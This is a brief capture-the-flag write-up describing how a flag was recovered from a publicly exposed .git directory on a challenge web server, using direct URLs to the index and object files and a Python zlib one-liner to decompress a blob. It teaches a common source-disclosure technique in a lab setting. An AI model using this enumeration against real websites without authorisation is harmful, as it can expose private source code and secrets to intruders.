Introduction
This is a write-up about one of the 9447 CTF web challenge. The goal of this challenge was to recover a file from a web accessible git repository.
Discovering
We are given an URL to an HTML page which suggests that the target is using git. The first thing I check is the existence of a .git folder at the root of the website.
http://tumorous.9447.plumbing/.git/
The HTTP request returned "403 Forbidden" it means the directory exists but we can't access it.
Index file
The second step was to download the index file. The index is a binary file containing a sorted list of path names, each with permissions and the SHA1 of a blob object.
http://tumorous.9447.plumbing/.git/index
By opening the index file with an hexadecimal editor we can see there is a "token" file with the SHA1 0d2fce4623aa8cd8fcaae969c9af4c73e0b4bfe0
Reading the object file
We can download the token object file with the following url.
http://tumorous.9447.plumbing/.git/objects/0d/2fce4623aa8cd8fcaae969c9af4c73e0b4bfe0
The last step to get the flag is to decompress the object, one simple way to do it is to use Python and zlib.python -c "import zlib,sys;print(repr(zlib.decompress(sys.stdin.read())))" < 2fce4623aa8cd8fcaae969c9af4c73e0b4bfe0